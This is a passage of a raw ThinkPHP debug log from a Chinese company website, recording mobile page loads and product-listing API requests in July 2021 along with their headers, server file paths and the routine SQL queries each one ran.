SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:26:30+08:00 ] 61.158.208.168 GET / [ info ] www.xn--vhqsn14am88k.com/ [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,016.69kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'host' => 'www.xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:27:21+08:00 ] 61.158.208.168 POST /api/index/nypro [ info ] www.kinsana.cn/api/index/nypro [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:2,387.14kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'nypro', ), ) [ info ] [ HEADER ] array ( 'x-requested-with' => 'XMLHttpRequest', 'accept-language' => 'zh-cn', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'accept' => '*/*', 'connection' => 'close', 'content-length' => '0', 'accept-encoding' => 'gzip, deflate', 'origin' => 'http://www.kinsana.cn', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/nypro' => '', ) [ info ] [ RUN ] app\api\controller\Index->nypro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 5 [ RunTime:0.015625s ] --------------------------------------------------------------- [ 2021-07-16T18:27:21+08:00 ] 61.158.208.168 POST /api/index/types [ info ] www.kinsana.cn/api/index/types [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:1,695.95kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'types', ), ) [ info ] [ HEADER ] array ( 'x-requested-with' => 'XMLHttpRequest', 'content-length' => '9', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'accept' => '*/*', 'connection' => 'close', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/types' => '', 'cate_id' => '5', ) [ info ] [ RUN ] app\api\controller\Index->types[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT `type_id` FROM `product` WHERE `cate_id` = 5 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `type` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `type` WHERE `id` IN (8,3,10,7,5,4,1,6) [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:27:24+08:00 ] 61.158.208.168 POST /api/index/smpro [ info ] www.kinsana.cn/api/index/smpro [运行时间:0.062500s][吞吐率:16.00req/s] [内存消耗:1,710.00kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'smpro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '19', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/smpro' => '', 'cate_id' => '5', 'type_id' => '1', ) [ info ] [ RUN ] app\api\controller\Index->smpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 5 AND `type_id` = 1 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:27:26+08:00 ] 61.151.178.164 GET / [ info ] www.xn--vhqsn14am88k.com/ [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,016.12kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'host' => 'www.xn--vhqsn14am88k.com', 'accept-language' => 'zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Mobile/14D27 MicroMessenger/6.5.5 NetType/WIFI Language/en', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:27:30+08:00 ] 61.158.208.168 POST /api/index/smpro [ info ] www.kinsana.cn/api/index/smpro [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:2,079.35kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'smpro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '19', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/smpro' => '', 'cate_id' => '5', 'type_id' => '3', ) [ info ] [ RUN ] app\api\controller\Index->smpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 5 AND `type_id` = 3 [ RunTime:0.015625s ] --------------------------------------------------------------- [ 2021-07-16T18:27:30+08:00 ] 61.129.6.174 GET / [ info ] www.xn--vhqsn14am88k.com/ [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,016.12kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'host' => 'www.xn--vhqsn14am88k.com', 'accept-language' => 'zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Mobile/14D27 MicroMessenger/6.5.5 NetType/WIFI Language/zh_CN', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:29:01+08:00 ] 61.158.208.168 GET / [ info ] www.xn--vhqsn14am88k.com/ [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,016.88kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'cookie' => 'safedog-flow-item=', 'upgrade-insecure-requests' => '1', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'host' => 'www.xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:29:05+08:00 ] 61.158.208.168 POST /api/index/nypro [ info ] www.kinsana.cn/api/index/nypro [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:2,387.38kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'nypro', ), ) [ info ] [ HEADER ] array ( 'x-requested-with' => 'XMLHttpRequest', 'accept-language' => 'zh-cn', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'accept' => '*/*', 'connection' => 'close', 'content-length' => '0', 'cookie' => 'safedog-flow-item=', 'accept-encoding' => 'gzip, deflate', 'origin' => 'http://www.kinsana.cn', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/nypro' => '', ) [ info ] [ RUN ] app\api\controller\Index->nypro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 5 [ RunTime:0.015625s ] --------------------------------------------------------------- [ 2021-07-16T18:29:05+08:00 ] 61.158.208.168 POST /api/index/types [ info ] www.kinsana.cn/api/index/types [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:1,696.34kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'types', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '9', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/types' => '', 'cate_id' => '5', ) [ info ] [ RUN ] app\api\controller\Index->types[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `type_id` FROM `product` WHERE `cate_id` = 5 [ RunTime:0.015625s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `type` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `type` WHERE `id` IN (8,3,10,7,5,4,1,6) [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:29:07+08:00 ] 61.158.208.168 POST /api/index/smpro [ info ] www.kinsana.cn/api/index/smpro [运行时间:0.062500s][吞吐率:16.00req/s] [内存消耗:1,770.78kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'smpro', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '19', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/smpro' => '', 'cate_id' => '5', 'type_id' => '4', ) [ info ] [ RUN ] app\api\controller\Index->smpro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 5 AND `type_id` = 4 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:29:11+08:00 ] 61.158.208.168 POST /api/index/procontent [ info ] www.kinsana.cn/api/index/procontent [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,708.30kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'procontent', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '5', 'referer' => 'http://www.kinsana.cn/m/cpxq.html?id=70', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/procontent' => '', 'id' => '70', ) [ info ] [ RUN ] app\api\controller\Index->procontent[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` `a` INNER JOIN `type` `c` ON `a`.`type_id`=`c`.`id` WHERE `a`.`id` = '70' LIMIT 1 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:29:18+08:00 ] 61.158.208.168 GET / [ info ] www.xn--vhqsn14am88k.com/ [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,016.88kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'cookie' => 'safedog-flow-item=', 'upgrade-insecure-requests' => '1', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'host' => 'www.xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T18:29:21+08:00 ] 61.158.208.168 POST /api/index/nypro [ info ] www.kinsana.cn/api/index/nypro [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,387.38kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'nypro', ), ) [ info ] [ HEADER ] array ( 'x-requested-with' => 'XMLHttpRequest', 'accept-language' => 'zh-cn', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'accept' => '*/*', 'connection' => 'close', 'content-length' => '0', 'cookie' => 'safedog-flow-item=', 'accept-encoding' => 'gzip, deflate', 'origin' => 'http://www.kinsana.cn', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/nypro' => '', ) [ info ] [ RUN ] app\api\controller\Index->nypro[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `product` WHERE `cate_id` = 5 [ RunTime:0.015625s ] --------------------------------------------------------------- [ 2021-07-16T18:29:21+08:00 ] 61.158.208.168 POST /api/index/types [ info ] www.kinsana.cn/api/index/types [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:1,696.34kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'index', 2 => 'types', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'content-length' => '9', 'referer' => 'http://www.kinsana.cn/m/nyycp.html', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.8(0x18000823) NetType/4G Language/zh_CN', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-cn', 'x-requested-with' => 'XMLHttpRequest', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/api/index/types' => '', 'cate_id' => '5', ) [ info ] [ RUN ] app\api\controller\Index->types[ D:\WWW\kinsasa\application\api\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s 